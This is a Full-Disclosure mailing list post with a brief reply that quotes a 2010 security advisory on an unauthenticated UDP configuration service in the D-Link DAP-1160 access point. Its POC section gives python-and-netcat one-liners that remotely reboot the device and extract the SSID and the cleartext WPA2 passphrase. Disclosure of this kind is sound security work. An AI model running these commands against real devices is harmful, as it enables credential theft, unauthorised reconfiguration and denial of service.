Is that UDP 2003 open on the WAN interface as well?
Gary Baribault
On 06/28/2010 09:50 AM, Cristofaro Mune wrote:
Security Advisory
IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote
Configuration
Advisory Information
--------------------
Published:
2010-06-28
Updated:
2010-06-28
Manufacturer: D-Link
Model: DAP-1160
Firmware version: 1.20b06
1.30b10
1.31b01
Vulnerability Details
---------------------
Public References:
Not Assigned
Platform:
Successfully tested on D-Link DAP-1160 loaded with firmware
versions:
v120b06, v130b10, v131b01.
Other models and/or firmware versions may be also affected.
Note: Only firmware version major numbers are displayed on the
administration web interface: 1.20, 1.30, 1.31
Background Information:
D-Link DAP-1160 is a wireless access points that allow wireless
clients
connectivity to wired networks.
Supported 802.11b and 802.11g protocols. WEP, WPA and WPA2
supported.
Summary:
Unauthenticated access and modification of several device
parameters,
including Wi-Fi SSID, keys and passphrases is possible.
Unauthenticated remote reboot of the device can be also
performed.
Details:
DCCD is an UDP daemon that listens on port UDP 2003 of the
device, that
is likely used for easy device configuration via the DCC (D-Link
Click
'n Connect) protocol.
By sending properly formatted UDP datagrams to dccd daemon it is
possible to perform security relevant operation without any
previous
authentication.
It is possible to remotely retrieve sensitive wireless
configuration
parameters, such as Wi-Fi SSID, Encryption types, keys and
passphrases,
along with other additional information.
It is also possible to remotely modify such parameters and
configure the
device without any knowledge of the web administration password.
Remote reboot is another operation that an attacker may perform
in an
unauthenticated way, possibly triggering a Denial-of-Service
condition.
POC:
- Remote reboot
python -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR>
2003
- Retrieving Wi-Fi SSID
python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o
ssid.txt
-u <IP_ADDR> 2003
cat ssid.txt (cleartext SSID displayed after "21 27 xx xx" in the
received datagram)
- Retrieving WPA2 PSK
python -c 'print "\x03" + "\x00" * 7 +
"\x23\x27\x00\x00\x24\x27\x00"' |
nc -u -o pass.txt <IP_ADDR> 2003
cat pass.txt (cleartext WPA2 PSK displayed after "24 27 xx xx"
in the
received datagram)
Impacts:
Remote extraction of sensitive information
Modification of existing device configuration
POssible Denial-of-Service
Solutions & Workaround:
Not available
Additional Information
----------------------
Timeline (dd/mm/yy):
17/02/2010: Vulnerability discovered
17/02/2010: No suitable technical/security contact on
Global/Regional
website. No contact available on OSVDB website
18/02/2010: Point of contact requested to customer service
----------- No response -----------
26/05/2010: Partial disclosure at CONFidence 2010
28/06/2010: This advisory
Additional information available at http://www.icysilence.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
------------------------------------------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
